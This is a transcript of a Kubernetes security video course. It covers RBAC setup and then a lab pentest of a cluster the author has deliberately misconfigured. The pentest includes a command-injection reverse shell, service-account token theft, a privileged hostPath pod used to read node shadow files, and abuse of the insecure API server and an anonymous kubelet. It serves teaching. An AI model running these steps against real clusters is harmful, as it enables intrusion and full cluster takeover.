enter. A namespace is created. Now we are going to create a service account in this namespace. What is a service account? When a human runs a command such as kubectl get pods, he is authenticated by API server as a user account. Similarly, processes in containers inside a pod can also interact with clusters. When they do it, there should be a mechanism to authenticate them, and this is achieved using service accounts. A service account represents an identity for processes that run in containers inside a pod. In Kubernetes, it is possible to create a service account and assign it to the pods. If no service account is explicitly assigned to a pod, it will get the default service account. So let's create a new service account. I have a directory called RBAC in my system, inside which I have all the files necessary for this exercise. All these files will be available for download. Now, to begin with, let's take a look at the file service.yaml. If you look at this, it is of kind service account, and we are specifying the name as RBAC-SA. That means we are creating a service account called RBAC-SA. Once that is done, we are specifying that RBAC-NS is the namespace that this service account is tagged to. And if you remember, RBAC-NS is the namespace that we have just created. So let's create this service account by typing kubectl apply-f service.yaml. Nice. Now the service account is created in the namespace that we have specified. Now let's quickly verify if it is created properly or not. To do that, I'm typing kubectl get SA. This is to list the service accounts, and I'm explicitly specifying the namespace from which I want to get the service accounts, RBAC-NS. There is a typo here. Look at that. kubectl get SA gets us all the service accounts available. Now, if you look at this, there is one default service account, and there is also another service account that we have just created. Now, let's create a role. If you look at the contents of this file, the kind is specified to be role, and the name is RBAC-role. So we are specifying that this is the name of the role, and we are explicitly specifying a namespace called RBAC-NS. If you remember, we discussed that roles are specific to a namespace, and that's exactly why we are creating this role in this specific namespace. Aside to that, we have listed some resources and verbs. The resources section specifies that this role is applied to pods. The verbs section specifies that list is the only operation a user with this role can perform. Right? So let's try to create this role. kubectl apply-f role.yaml. As you can see, the role is now created. Now we can actually check if this role is created or not in the namespace RBAC-NS. To do that, let's type kubectl get roles --namespace RBAC-NS. If you look at that, the role is created. Now, one last step that we are left with is creating a role binding. If you remember, after creating a role, to be able to assign that role to a user account, we need to create a role binding. So let's do that. To create the role binding, we do have another YAML file, that is RBAC-rolebinding.yaml. And if you look at the contents of this file, the name says RBAC-rolebinding. And once again, we are specifying the namespace explicitly as RBAC-ns. And if you look at this role binding is tying the user to a role, right? So service account is the user in this case, which is RBAC-SA. And we are tying it with the role RBAC-role. Once this role binding is created, this service account will have this role in this namespace. So let's create this by typing kubectl apply -f RBAC rolebinding.yaml. Looks like that is created. Now we can quickly check if it is created by typing kubectl get rolebinding -namespace RBAC-ns. Look at that, a role binding has been created. Now we have created everything that is required for testing role-based access controls. So let's quickly create a pod and test these role-based access controls against it. In my current directory, I have a file called api.yaml. So let's quickly create a pod using that. If you look at the contents of this api.yaml, it is a deployment and it is being deployed into the namespace RBAC-ns, and a service account called RBAC-SA is given access. Now let's quickly create this pod and check the role-based access controls we have created. I'm typing kubectl apply -f api.yaml. And as you can see, the new deployment is created. Now let us check if the pods are running in the namespace RBAC-ns by typing kubectl get pods -namespace RBAC-ns. If you look at the output, there are 2 pods being run. Now let's verify if the role we created is applied to the service account which was assigned to these pods. To verify that, what we are going to do is we are going to get an interactive shell on one of these pods, and we will try to list the pods as well as services. We should be able to list the pods from within the pod, but we should not be able to list the services, because the role only specifies that the service account that we have created can only list the pods but not the services. Before we check that, I would like to quickly copy the kubectl command line client into the current location, which kubectl. So basically I'm just going to copy that into the current directory, user bin kubectl, and let's copy it here. We missed cp, and there it is. Now let's open a new tab. I'm going to start a simple Python web server, which comes as a module with Python 3, Python 3 -m http.server. As you can see, the Python web server is now running. Now let's try to get a shell on one of the pods. First, let's list down the pods in the namespace. Let's copy one of the pod names and try to get a shell, kubectl exec it, and let's paste the name here and sh -namespace RBAC-ns. Hit enter, and now let's try to download kubectl into this pod. Basically, we want to verify that this pod only has the role that is assigned to the service account. So let's try to download it. 168.1.102 8000 / kubectl. The kubectl is downloaded now. Let's change its permissions and let's try to run kubectl get pods. As you can see, we are able to list the pods from this pod. Now let's try to list the services. We are unable to list the services, and this is expected. Our role specifically gives list access to pods, and thus we are unable to list the services. In this example, our service account RBAC-SA can access pods only from the RBAC-NS namespace, because roles and role bindings are applicable to a specific namespace. Now let us assume that you want to be able to get pods from other namespaces as well. In that case, we will have to use cluster roles and cluster role bindings. In the previous video, we have created a role and we performed role binding by attaching this role to a service account. We also learned that roles and role bindings are scoped to namespaces. And when we attached the service account to a pod, we observed that we were only able to access the resources that were defined in the role. According to the role we have created, we were able to list the pods, but we were unable to list the services. The service account we have created can only access pods from the namespace that it is bound to, which is RBAC-NS. Because roles and role bindings are applicable to a specific namespace. Now let's assume that you want to be able to list pods from other namespaces in the cluster. In that case, you will have to use a cluster role and cluster role binding. Now that is what we are going to see in this video. We are going to see a practical example of how to create a cluster role and use it in a cluster role binding. So let's switch to the virtual machine. Once again, I'm using the master node and I have created the files that we need for this exercise. First, let's take a look at the file called service2.yaml. If you look at the contents of this, we are creating a service account called RBAC-cluster-SA. So let's type kubectl apply -f service2.yaml. Hit enter, and as you can see, the new service account RBAC-cluster-SA has been created. Now we want to create a cluster role. Let's take a look at the contents of cluster-role.yaml. If you look at the contents of this file, we are first specifying the kind as cluster role. That means we are creating a cluster role and we are naming it as RBAC-cluster role. And this cluster role is going to be applied on pods. And list is the only verb that is specified here. So essentially, if this cluster role is given to a specific user, the user will be able to list the pods across the cluster. Now let's clear the screen and run kubectl apply -f cluster role.yaml. As you can see, the cluster role has been created. Now let's quickly verify if everything went fine so far. So let's first check if the service account has been created. Kubectl get SA. If you look at the output, a new service account called RBAC-cluster-SA has been created. Now let's also check if the cluster role is created. Kubectl get cluster role, and let's grep for RBAC. Hit enter. We can see that there is a new cluster role created there. All right, now the next step is to create a cluster role binding. Once again, I have a file that I have created for this, cluster role binding.yaml. Now, if you look at this, we are creating a cluster role binding by specifying the kind as cluster role binding. The subject here is the service account with the name RBAC-cluster SA, and we are assigning this cluster role called RBAC-cluster role to this service account. So we are binding the service account and this cluster role using the cluster role binding. So let's once again type kubectl apply -f cluster role binding .yaml. Hit enter, and as you can see, a new cluster role binding has been created. Now once again we can quickly check if this cluster role binding has been created or not. We can do that by typing kubectl get cluster role binding, and let's grep for RBAC. As you can see in the output, we have created a new cluster role binding. Now with this, we are done with everything that we need. Now let's quickly deploy a pod using a deployment and assign the newly created service account to the pod. This can be done using the API v2.yaml. If you look at this, we are creating a deployment, and the service account name that we are using here is this. So essentially, this pod gets whatever the privileges that this service account has. So RBAC-cluster SA is the service account that we have just created, and we are giving the pod this service account. Let's once again quickly type kubectl apply -f API v2.yaml. Hit enter, and as you can see, the RBAC-test has been created. It's a deployment. Now we can quickly check kubectl get pods. If you look at this, there is a new pod that is just created 14 seconds back. So we can just copy this, and let's quickly get a shell using kubectl exec it, and let's paste it. And we want to have an interactive shell, so /bin/sh. Hit enter, and if you see, we have gotten a shell. Now let's try to download kubectl from the master node once again by using wget 192.168.1.102 and hit enter. As you can see, kubectl has been downloaded here. Now let's change the permissions of kubectl by typing chmod +x kubectl, hit enter, and now let's execute kubectl to get the list of pods. /kubectl get pods. As you can see, we are now able to see all the pods. Now let's specifically try to get pods from a specific namespace. Kubectl get pods --namespace, and let's call it default. So this is the same output that we have gotten earlier. Now let's try to get the pods from RBAC-ns. As you can see, there are no resources found in RBAC-ns namespace, so we are not seeing anything, but we are authorized to list the pods from any namespace. To confirm that, we can try to get the list of services from any namespace by typing kubectl get services. If our analogy is correct, we should get a forbidden message. Let's hit enter, and there you go. We are seeing a forbidden message because this service account doesn't have access to list services. This service account's permissions are limited only to list the pods across the cluster from any namespace. This is how cluster roles and cluster role bindings work. Now we are going to make use of this concept to create a small misconfiguration in our cluster. That's exactly the reason why I have explained all these concepts so far. Once we introduce that misconfiguration into our cluster, we are going to get started with the pen testing concepts. That's all for this video. See you in the next one. In this video, we are going to introduce a small misconfiguration into our cluster. Let's switch to the master node, and let's create a simple cluster role binding on this machine. I'm going to do that by typing Kubectl, create cluster role binding, encode decode service, and then the cluster role that we are giving to this service account is cluster admin. And the service account that we are going to use is the default service account in default namespace. Now, this is the misconfiguration that we are introducing into this cluster. We will understand why this is dangerous during the post-exploitation phase of our attacks. But for now, let's just create a new cluster role binding as shown here. Since we had been doing a lot of deployments into this cluster, let's first clean up all the pods and let's freshly deploy the vulnerable application once again. To do that, I'm going to first type kubectl get pods. As you can see, there are 6 pods running here. First, let's delete the pods that are starting with RBAC-test. So let's go to RBAC folder here, and this is created using the file apiv2.yaml. So let's go ahead and use kubectl delete -f apiv2.yaml. If we type kubectl get pods once again, we should see there are only 4 pods running now. Let's also delete those pods. So I'm navigating to desktop, downloadables, and updated files. And let's type kubectl delete -f api.yaml webapp.yaml and api-service.yaml webapp-service.yaml. Alright, so we are pretty much done with deleting all the pods. Let's quickly double check kubectl get pods. Alright, so the namespace is now empty. So let's just deploy the application once again. Kubectl apply -f api.yaml api-service.yaml webapp.yaml webapp-service.yaml. Alright, so let's quickly check if the application is accessible. Let's type the IP address of one of the nodes. In my case, I'm going with the master node. As you can see, I'm able to access the service. Let's also check if the encode service is properly working or not. And yes, it does. Now with this, we are pretty much done with the lab setup, and now we are ready to get into pen testing angle. Welcome back. In this video, we are going to get started with the pen test angle. We are going to perform a simple network penetration test on the Kubernetes cluster, and let's see what we can achieve. So I'm switching to my Kali machine, and let's do a simple NMAP scan against both the master node as well as on the worker node. NMAP, the IP address of the master node and the worker node, and let's use a service scan, and let's also write the output into a file called Kubernetes PT. Hit enter. As we can see here, the standard NMAP scan has produced only one open port. The other open port, which is 8000, is the simple HTTP server that we started to transfer kubectl binary. So we can ignore that. And the worker node also has the same port, which is 80. Now, it is always important to perform a full scan against a Kubernetes cluster, because there could be some other ports that can be useful to an attacker. So let's do another full scan. This time I'm just adding the flag -p- so that all ports will be scanned, and I'm also changing the file name to full scan. Right, so this is going to take a bit of time because we are scanning all the ports on 2 hosts. So I'm going to pause the video, and once the scan is complete, I will resume it. Now the scan is complete and we can see some additional open ports available here. If you look at the output, there are 3 additional HTTP ports available on the worker node. Let's also take a look at the master node output. Interestingly, the master node has way more ports open. We are going to see how some of these services could be misconfigured by a Kubernetes admin in later videos. But for now, let's end this video here. In the next video, we are going to see how we can exploit the encode decode service application, which is running on port 80. Alright, so that's all for this video. See you in the next one. In this video, we are going to exploit a remote code execution vulnerability in encode decode service application. So first, let's access the target application from Kali Linux and let's try to understand the functionality. We already know it. And let's exploit the remote code execution vulnerability and let's get a reverse shell. Alright, so let's get started. Let's switch to the Kali Linux and let's access a browser. I'm opening up Firefox and let's try to access the web application from here. 192.168.1.102, which is the IP address of the master node. And this is the application. Let's quickly check what this application is actually doing. I'm going to enter some test string. As you can see, it is giving us some base64 encoded output. Now, let me quickly show you the source code of the API that is being used in the backend. So this is the source code of the API.py file, which is a Flask API. As we can see here, some user-controlled input is being passed to the application, and that user-supplied input is used to form some command, and after forming that command, it is executed using subprocess.check_output function. Since there is no input validation performed here, the application will execute any commands coming from the users. So we are going to exploit this vulnerability to get initial footprint into the cluster. So let's switch to Kali Linux and let's try to inject some system commands. I'm going to use ls and I'm going to click on encode and let's see what happened. I'm copying this and I'm going to decode this base64 encoded text here. Let's paste it and let's pipe it to base64 and type decode. If you see, there is no output. It is just what we have passed. So we need to try differently. Let's go back and let's type test ls and see what happens. Looks interesting. The test is not base64 encoded, but there is something else that is base64 encoded. So let's copy this. And once again, let's try to replace this and base64 decode the encoded text. Hit enter. Interesting. Looks like our ls command got executed and we have gotten the list of files in the current directory of the container. That's interesting. The user supplied system command is received by the application and it is executed first, and then the output is base64 encoded and it was sent back to the user. Now let us see if we can get a reverse shell using this technique. If the remote system has netcat installed, our job is going to be very easy. So let us check if the target has netcat available. I'm going to run test which nc, click encode. Looks like there is an error, but don't worry, this is not a roadblock. The application has thrown an error because of the space in the command. We have entered test which space nc. If you click encode, it's going to fail again. That's because we have a space in the command. So we just need to replace the space with %20. So let's type test which encode the space character and type nc. Now let's click encode once again And interestingly, there is no error this time. And let's check what this is. I am pasting the base64 encoded text here and hit enter. There is some good news. Netcat is available on the target container. Now we can make use of this Netcat client to get a reverse shell. So let's first start a listener. NC-LVP port 4444. Hit enter. And our Netcat listener is ready. Now we need to construct the payload that we want to inject into the application. So let's open up a notepad and let's type test and let's invoke netcat by typing nc and the IP address of this Kali machine. So let's quickly find out the IP address of this machine here. As you can see here, the IP address of this machine is 110. So let's go back and type 192.168.1.110. We will fix all the spaces later, but first let's craft the payload. And we are going to connect back on port 4444 and we want to use -e/pin/sh. Now all we have to do is just fill in these spaces with %20. Copying this and I'm going to paste it here and I'm also going to paste it here and I'm also going to paste it here. That's it. So our payload is now ready. Let's copy this and go back to the browser and let's try to paste it here and click encode and see what happens on the listener. There you go, we got a reverse shell. Now let's try to run some basic commands to check if the shell is stable. Looks like we got root access. That's even more interesting. And the current working directory is /app. And let's check the Linux version. You can see this here. It is using a Ubuntu base image and it's a 64-bit system. That is great. We have gotten our initial foothold into the cluster using a remote code execution vulnerability in a web application that is running in the cluster. Welcome back. Now let's begin from where we left off in the previous video. We have exploited a remote code execution vulnerability and we have gotten a reverse shell. Now we know that we have landed in a Kubernetes cluster because we are the ones who did set up the vulnerable application in a Kubernetes cluster. Now let's assume that we are doing a pure black box assessment and we do not know that we are in a Kubernetes cluster. Now we will have to perform some information gathering to figure out where we are. So let's do that in this video. As an attacker, we are going to understand the target machine. We are going to examine the system to understand where we landed, and we are also going to look at some environment variables that can be useful later. I am switching to the Kali machine, and this is the shell we have gotten earlier. Now the first thing that I want to do is to check the environment variables that we have on this shell. Look at that. As you can see here, there are multiple variables with the word Kubernetes. This is a hint that the target box is running in a Kubernetes cluster. So if you look at this, there is a Kubernetes port, API service port, Kubernetes service port. These environment variables are a very good indication that we have landed in a Kubernetes cluster. Now let's also check the mount points on this machine. We can use mount command and let's grep for Kubernetes. Hit enter. As you can see here, there is a folder called /run/secrets/kubernetes.io/service account. This is going to be useful for us later, so let's take a note of this. I'm copying this and I'm going to paste it in my notepad. All right, so let's move on. Now the next thing that I want to do is I want to check the C groups. So let's clear the screen and let's type cat/proc/1/C group. If you look at the output, there are multiple entries with the word kube pods. This is another very good indication that we are inside a Kubernetes cluster. During black box assessments, these are some of the ways to check if we are inside a Kubernetes cluster. After confirming that we are in a Kubernetes cluster, we may want to check for the availability of some useful utilities like kubectl, and if they are available, we can use them for digging further information about the cluster. So now that we have confirmed that we are in a Kubernetes cluster, in the next video, we are going to do some more enumeration using the shell that we have gotten. Welcome back. Let's begin from where we left off in the previous video. Now let's perform some more enumeration to see if we have any interesting clients available on the shell. After getting a shell on a Kubernetes cluster, having access to an HTTP client or kubectl is going to be very useful, because we may want to transfer files onto the target from the attacking machine. We may also want to interact with the Kubernetes API server. These are some of the reasons why we want to have these clients installed. If at all they are not available, probably we will have to transfer them somehow. So let's begin by checking if we have kubectl available on this terminal. Type which kubectl. Looks like it's not available, so we are unable to see that. Let's type which curl. Once again, we are out of luck. Curl is also not installed. Let's look for wget. There you go. Interestingly, wget is available on this container, so we are not out of luck. Even though curl and kubectl are not available, wget is available. This is good enough to get started. So using wget, let's try to connect to the API server and fetch the details about the running pods in this cluster. For this, we need to have the IP address of the Kubernetes API server. If you remember, we have typed env in the beginning and we have gotten the Kubernetes API server details here. So let's copy this and let's paste it here. And this is what is going to be the IP address of the API server. So let's use that. wget https 10.96.0.1/API/v1/namespaces. We are going to attempt to get the list of pods from the default namespace. So let's type default and pods. Running this command did not return anything. This is due to the fact that we do not have sufficient privileges to query this information. This is where we can try to make use of what we have found earlier, which is this service account directory. So let's copy this and let's try to do an ls and see if we can get something from here. Hit enter. Interestingly, this directory has 3 different files. Let's check the contents of namespace and token. So I'm typing cat/namespace. Hit enter. It says default. That means this token is valid in default namespace. Let's also check the contents of token. Hit enter. Interesting. We are able to see the token as well. Now let's try to use these details with wget and try to check the running pods once again. But before that, let's try to put this value into an environment variable. That's because we are going to use this token in the wget command, and this is too large to use. So let's copy this and type export token equals to cat, and let's paste the path of the file. and hit enter. Now the token environment variable should have the content of this file. Now we can try to run the wget command. So let's type wget https. Once again, try to access 10.96.0.1/API/v1/default/pods. Now this is what we have tried earlier. Now we are trying to make use of this token to get the list of pods. This is a JWT token, so we can pass it in authorization header. So let's specify header equals to authorization bearer, and let's specify the value of the token, which is basically the environment variable here. And let's also add no check certificate, and let's output everything into a file called pods.txt. Now we are trying to avoid certificate errors, so we have specified no check certificate, and we are writing the response into a file called pods.txt so we can access it later. Now let's hit enter, and let's see if we have a file called pods.txt. Yes, there is. Now let's try to look for cat pods.txt. This is going to give a long output. So let me first clear the screen. Even then, the output is going to be so long. So let's grep for some known pods. In our case, we know some pods like API and web app. So let's grep for API and hit enter. Now this output confirms that we managed to get the list of pods from the default namespace. If you look at this, there is an image called hacking Kubernetes/API latest. This is the image that we were pulling when we were setting up the lab, right? So this confirms that we managed to bypass the restriction that we had earlier, because there is a service account token available and that is mounted into our pod. All right, that's all for this video. In the next video, we are going to transfer kubectl command line utility onto this compromised container, and we are going to run some kubectl commands from there. Welcome back. This is what we have done so far. We have obtained secrets from the service account directory, and we have set required environment variables, and we have grabbed the list of pods by using the token that we have obtained from the service account directory. We have also checked for some of the utilities that are available for us, and we confirmed that wget is available. Now we are going to use wget to transfer the kubectl binary onto the container where we have gotten the shell. After that, we are going to use this kubectl binary to do some more enumeration. And based on the information that we obtained from there, let's attempt to get shells on each container, and let's see what we can do from there. I'm switching to my Kali machine. Let's first download the kubectl binary from the master node onto Kali machine. wget 192.168.1.102/kubectl. It is downloaded. Now let's start a simple Python server on Kali machine. Let's see if simple HTTP server is available. It is. So we are going to use this simple HTTP server to serve kubectl binary for the victim. Now let's go back to the shell that we have gotten earlier, and let's download kubectl binary from Kali machine onto the victim's container. Let's type wget http 192.168.1.110:8000/kubectl. Hit enter, and let's verify if we have downloaded kubectl here. There you go. Kubectl is now available on this machine. So let's quickly try to change the permissions and see if we can execute that. Now let's try to execute some basic kubectl commands. Kubectl, and let's check if we can list the pods. Can I list pods? Hit enter. It says yes. Now let's also check Kubectl. Can I create pods? It says yes. As we can see, we have checked if we can list and create the pods in this namespace. We got to know that we can both list the pods and create the pods. This is interesting. Now this gives us an opportunity to create a malicious pod in this cluster. But before that, let's try to get the list of pods using kubectl, kubectl, get pods. As you can see, there are 4 pods running here. Now let's also check the list of nodes available. Kubectl, get nodes. All this information is going to be crucial for us at a later point of time. So let's make sure that we are taking note of all of this. So I'm just copying this and I'm going to paste it here. And now let's try to list the services. Kubectl, get services. And if you see, there are 3 services available here. Now let's go back to the notes that we have taken. If you see this, there are 2 different pods that are running here. One is API and the other one is web app. Now what we are interested in is we want to get a shell on each of these and see what we can access. We are already inside one of these pods, so we don't have to get a shell once again because we already got a shell on one of these pods. So let's quickly check what information we have in the container. ls, and let's type cat api.py. And if you see this, we are able to see the source code of this Flask API. So that means we got access to the source code of the application. Apart from this, there is no other application specific information available on this target. Now let's also try to get a shell on the web application pod. Let's copy this and let's clear the screen and let's type kubectl exec -it and let's paste the pod ID and /bin/sh. Hopefully we have gotten the shell. Now let's type ID. Once again, we have gotten root access on this container as well. Let's type pwd. As you can see, we are running inside the web root, and let's type ls index.php. Let's type cat index.php, and look at that. We have gotten full access to the PHP source code as well. Once again, we did not find anything interesting on the pod except for the access to the source code. So this is how we can make use of the access that we have gotten to get shells on different containers. In the next video, we are going to explore some options to escape from the pods to get access to the underlying host. So far, we have gotten shells on all the pods that we have access to. Now we are going to elevate our privileges so that we will get access to the underlying host. One way to elevate our privileges by escaping from the pod is to look for any vulnerabilities or misconfigurations in the containers that are used. Now, another easier way of doing it is to create a malicious pod which contains these misconfigurations. So create a malicious pod with some misconfigurations, get a shell on that, and then escape from it onto the host. So that's the approach that we are going to take now. So we are going to create a malicious pod with the access that we have gotten so far. So let's switch to the Kali machine and download malicious.yaml file that we have used on the master node earlier. Let me first switch to the master node, and here is the content of malicious.yaml. I'm going to stop the Python web server that is already running here, and I'm going to start another instance. Right. right? So now we are serving malicious.yaml file for the Kali machine. So let's just download it from there. wget 192.168.1.100:malicious.yaml. Hit enter. The IP address is incorrect. It is 102. There you go. The malicious.yaml file is now downloaded. Now we can download that file from the shell that we have gotten on the container. So let's switch to the shell that we have gotten and type wget 192.168.1.110:8000. This is where the Python web server is running on Kali. And let's download the malicious.yaml file. Hit enter. And let's check if it is downloaded. Yes, it is. So we are now going to use this malicious.yaml file to start a container. Let's first take a look at the contents of this file and see why this is malicious. If you look at this, this has all sort of problems. We have mounted the host's volume and we are also starting the container in privileged mode. So this container is going to give us an opportunity to escape from the container onto the host. Now let's try to create a pod. Kubectl create or apply -f malicious.yaml. As you can see, a pod has been created. Now let's type kubectl get pods. And there you go. There is a new pod called attacker, which is now started in the Kubernetes cluster. Now this pod is started by the attacker. Now let's try to get a shell on this container and see what happens. Kubectl exec -it. The name of the pod is attacker and get binsh. Nice. Now we have gotten a shell, hopefully. Now let's check where we are. We are inside the container, as you can see here. Now this is the same container that we have used to create a malicious pod, and that's why we are seeing the same files there. Now let's try to take a look at the contents of attacker/etc/hostname. Look at that. We managed to get a shell on the newly created pod, and we are able to access the file system of the host where this pod is running. So why are we accessing it from /attacker path? That's because in the malicious YAML file that is specified. Let's take a look at the contents. Cat malicious.yaml. And if you look at this, this is the mount path. So from the host, this is mounted. And now we are able to access this mounted path from within the container. So to summarize, we managed to get a shell on the newly created pod, and we are able to access the file system of the host where this pod is running. The host's root directory is mounted inside /attacker folder on the container, as we specified under container mount path in malicious.yaml file. Now let's quickly check what kind of privileges we have on the worker node. Cat attacker etc shadow. Look at that. We are able to see the shadow file of the worker node. We do have full control on the node. Since the container is running in privileged mode, it is also possible to get an interactive shell on the host. We are not going to get into the specifics of how to get an interactive shell on the host machine, but it proves the point that we have full access to the underlying host. Now that is interesting. We have gotten access to the worker node, but the attack is going to be complete if we can also get access to the master node. In the next video, we are going to see how we can laterally move to gain access to the master node. Now let's begin from where we left off in the previous video. We have gained access to the underlying host, which is the worker node, but our goal is now to laterally move to gain access to the master node. So let's see how we can do that. I'm going to slightly modify the malicious.yaml file. So let's copy this. And let's open up a new text editor. And let's paste it here. And we are going to add a single line here, node name. And we are going to choose master as the node name here. So essentially, we are creating a YAML file that will force the creation of pod on the master node. So if we create a pod using this YAML file, it is going to create a pod on the master node. How do we know that there is a node called master? Because earlier during our information gathering phase, we have listed the output of get nodes, and we know that there is a node called master running there. Since we have specified master here, now this pod is going to be created on the master node. So let's quickly save this file. And let's call it mal.yaml and click save. Now, before we download this YAML file onto the victim's machine, let's also change the name of the pod and the name of the container. So I'm changing this to attacker2 here, and let's also change this to attacker2. Let's save this file. And now let's go back to the shell that we have gotten earlier, and let's type wget 192.168.1.10:8000/mal.yaml. Hit enter, and it should have been downloaded now. Let's quickly check that. There it is. Now let's quickly create a new pod using kubectl create -f mal.yaml. Hit enter, and there you go. As you can see, a new pod called attacker2 has been created. Now let's check kubectl get pods, and as you can see, a new pod has been created and it is up and running. Now let's try to get a shell on this. kubectl exec-it, and let's paste the name of the pod, and let's type /bin/sh. Now hopefully once again we are inside the container. There you go. Now let's once again try to check the permissions we have here on this, and let's also check if we can access the host. We are root here, and now let's check /attacker/etc/hostname. There you go. We are now on the master node. Once again, just to confirm that we have full access on this, let's type attacker/etc/shadow. Look at that. We are able to read the file etc shadow, and that confirms that we have now fully compromised the Kubernetes cluster. The key takeaway from this video is that we can force pod creation on a specific node if pod creation on that specific node is not restricted. So we have compromised the worker node as well as the master node, and thus this completes the full cluster compromise during the pen test. Now let's summarize the attack we have performed. Before that, it is important to note that the default service account in the default namespace doesn't have excessive privileges. That's the reason why we have provided cluster admin privileges to the service account using a cluster role binding. The service account for the namespace default is injected into the pods by default. Our vulnerable application is also deployed into the default namespace, and thus we were able to see the service account secrets that are mounted in the service account directory. Now, due to the excessive privileges the service account has, we managed to elevate the privileges and move laterally to all the nodes in the cluster by creating malicious pods. So it is important to note that if we did not create this service account with excessive privileges, this attack is not possible. In this video, let's talk about some attacks that are possible against Kubernetes API server. Whenever we type any kubectl commands, API server is what it interacts with to get the job done. If an attacker gets access to Kubernetes API server, it is possible to get full access to the cluster. This Kubernetes API server is available on two ports. One is localhost port, which is 8080. This port is also known as insecure port, and it is disabled by default. Of course, this port can be changed by modifying the value of this -- insecure port in a configuration file, which we will see in a moment. And we can also change the bind address. As the name suggests, by default this is bound to localhost, but we can change that by modifying this entry in the configuration file. Now these configurations can be changed in a file called kubeapiserver.yaml. We are going to see that in a moment, but before that, let's get into secure port. Secure port is available on port 6443 by default, and it uses TLS certificates for authentication. Once again, we can change this port number by using the option -- secure port, and we can also change the bind address. Now, if you closely observe these options, Kubernetes documentation is trying to tell us that using this port can be extremely dangerous in production clusters. If at all this service is exposed over the network with anonymous access, it is extremely dangerous and it is possible for an attacker to compromise the full cluster. This localhost port or insecure port is intended for testing, and this doesn't use any TLS. Now let's see how we can misconfigure it as an administrator in our Kubernetes cluster, and then let's also see how an attacker can abuse it. So let's switch to the master node. To enable this insecure port, we need to open up the file kube-apiserver.yaml. This can be done by typing sudo gedit /etc/kubernetes/kube-apiserver.yaml. Let's hit enter. Now let's look for the entry -- insecure port. Here it is. If you look at this, by default, this value is set to 0. So let's quickly change it to 8080. Let's also add another entry here to specify the bind address. It is -- insecure bind address. And let's expose this service over all the interfaces. So let's make it 0.0.0.0, and let's save the file. Make sure that you do not have any typos here. If at all there are any typos, the API server will fail to start. So let's save the file and let's close it. And let's quickly check if the API server is working fine. kubectl get nodes. There you go. It is fine. Now let's switch to the Kali machine and see if this port is exposed. Let's do a quick NMAP scan by typing nmap 192.168.1.102-p 8080-a, and let's hit enter. The NMAP scan is complete. Now let's see the output. I'm just scrolling up, and there is some interesting output here. If you look at this, the insecure port 8080 is open and it is exposed, and it seems like we are able to access a lot of different APIs without requiring any authentication. Now let's see how we can abuse this. One way to abuse the exposed API server is to identify the APIs of our interest and interact with them using a tool like curl. So let's begin by accessing the first endpoint, which is /API. Let's take a copy of these paths. And let's paste it in our notes. And let's try to access the first endpoint, which is /API. Curl http 192.168.1.102 1.102:8080/API. Look at that, we are able to access the API. Now another way is to use the kubectl binary itself. If you remember, we have downloaded kubectl binary from the master node. Now let's see if we can use that. Let me first check if kubectl is in the current directory. Yes, it is. Now, since we have this kubectl binary here, we can use it just like an administrator. The only difference is that we will have to specify the address of the API server in the kubectl command. So let's see how we can do that. Let's first check if kubectl has executable permissions on this machine. It doesn't have executable permissions. So let's quickly change the permissions of this binary. chmod +x kubectl, and it should now be executable. So let's type kubectl get nodes. Now, as I mentioned earlier, we will have to specify the address of API server. That can be done by typing http 192.168.1.102:8080. Let's hit enter and see what happens. Look at that. We are able to access the list of nodes from the remote machine just because the API server is publicly exposed. Now let's see if we can also list the namespaces. Let's hit enter, and there you go. If you see here, we have created the RBAC-NS namespace earlier when we were working on role-based access controls. Now let us check if there are any running pods on the remote machine. So let's type get pods. As you can see in the output, there are a bunch of pods running here. 4 of them are associated with the vulnerable application, and 2 of them were actually started by us when we were exploiting the remote code execution vulnerability in the vulnerable encode-decode service application. Now, just like what we have done after exploiting the remote code execution vulnerability, we can create a malicious pod even from here remotely. So let's see how we can do that. I'm going to edit the malicious.yaml file once again from here, and I'm going to deploy a pod remotely from this attacking machine. So let's open our mal.yaml file once again, and let's make some changes to it. So this is the file that we have used earlier. I'm going to change the name to API server attack, and let's copy this. And let's also rename this and use the new name API server attack. And let's also change the name of the container, and let's save this file. All right, now let's quickly go back to the terminal and let's type kubectl, the address of the API server, apply -f mal.yaml. Let's hit enter, and if you look at that, the output says that API server attack created. Now let's list the pods to see if this pod is really available on the cluster. Look at this, there is a new pod called API server attack. Let's copy this and let's try to get a shell on this. Kubectl, the address of the API server, exec -it, and let's paste the name here, and let's type sh. If you look at this, we have gotten a shell successfully, and let's type id, and let's try to access the underlying host, cat attacker /etc/shadow. There you go. If you look at this, we have gained access to the master node through the exposed API server. So once again, we have forced the pod creation on the master node, and we have gained access to the underlying host through the volume mount feature. Similarly, we can create pods on other nodes in the cluster, and we can basically compromise every single node in the cluster. So this is the reason why insecure port is named as insecure, and you have to be extremely cautious if you are deciding to use this. In one of the earlier videos, we discussed that Kubelet agent runs on each node in the cluster. This agent is required on the nodes for launching pods, sending status about the node, sending status about the pods running on the node, and a bunch of other metrics. Now, other components in the cluster can actually interact with this agent through an API, which is called Kubelet API. If this API is exposed to unauthorized users, it is possible to achieve a full cluster compromise. We are going to see two different types of attacks through an exposed Kubelet API. The first one is remote code execution, and the second one is information disclosure. In the older versions of Kubernetes, Kubelet API is exposed over the network with anonymous access. This means anyone who has access to this API can access information such as available pods in the cluster. In addition to it, it may also be possible to have command execution on the pods. Fortunately, in the latest versions of Kubernetes, Kubelet is not configured to have anonymous authentication by default. To demonstrate how an attacker can abuse an exposed Kubelet API, I'm going to change the settings and misconfigure the cluster and expose this Kubelet API with anonymous authentication enabled. Let's do that. This time, we are going to make these changes on the worker node instead of master node. We can actually enable this Kubelet API on every single node, including the master node, but there is a reason why I want to do it on the worker node. The reason is, if you enable this on the worker node, it will enable us to get a shell on the pods that are running on the worker node. In this case, the pods that are associated with the vulnerable application are going to be running on the worker node, and that's where we want to get a shell. So let's switch to the worker node and let's make the changes. Now, before we make the changes, let me quickly show you my IP address on the worker node. If you look at this, this is 192.168.1.123. Earlier it was 1.105. Similarly, let me quickly show you the IP address of the master node. If you notice, the IP address of the master node is also changed from 1.102 to 1.127. The reason is I have restarted my machine and I have a dynamic IP address assignment, and thus the IPs have been changed. The rest of the setup is basically the same as what I have shown you earlier. So let's make the Kubelet API changes on the worker node. I'm switching to my worker node. And let's type sudo gedit var lib kubelet config.yaml. Let's hit enter and let's observe the contents of this file. There are two settings that we want to change in this file. One, authentication, and two, the authorization. If you look at this, the anonymous authentication is currently set to false. So let's make it true. And the authorization mode is currently set to webhook. Let's make it always allow. All right, these are the only changes that we need. So let's save the file and let's quickly run sudo systemctl restart kubelet.service. All right, now let's go to the Kali machine and do a quick NMAP scan and see what we get. Let's type nmap 